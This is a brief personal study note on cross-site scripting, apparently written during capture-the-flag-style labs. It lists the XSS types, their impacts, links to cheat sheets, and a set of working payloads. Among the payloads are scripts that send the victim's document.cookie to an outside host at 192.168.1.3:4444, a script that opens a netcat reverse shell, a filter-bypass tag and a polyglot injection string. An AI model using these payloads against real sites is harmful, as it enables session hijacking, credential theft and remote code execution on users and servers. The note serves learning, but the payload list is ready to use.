not:	use innerHTML to Know filter edit

.Cross site scripting (XSS)
	1.Reflected XSS
	2.sored XSS
	3.DOM based XSS

.what is XSS can do ?
	1.SXX Attach 1: Hijacking user's session
	2.SXX Attach 2: Perform unauthorized activites
	3.SXX Attach 3: Phishing to steal user credentials
.How to find it ?
	1.usually => any where that validat user input like search and reflected on page or screen



.Good => Links
	1.https://github.com/s0md3v/AwesomeXSS   or   search about => "s0md3v /AwesomeXSS"
	2.https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#event-handlers




.Some Scripts I used it while Some lab
	1.<script>alert()</script>
	2.<scr<script>ipt>alert()</script>
	3.<script>new Image().src="http://192.168.1.3:4444?output="+escape(document.cookie)</script>
	4.<script>document.createElement("img").src="http://192.168.1.3:4444?output="+escape(document.cookie);</script>
	5.<script>require('child_process').execSync('nc -e /bin/sh 192.168.1.3 4444', { encoding: 'utf-8' })</script>
	6.<svg/src=1 onerror=alert()>

Awasome Script
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
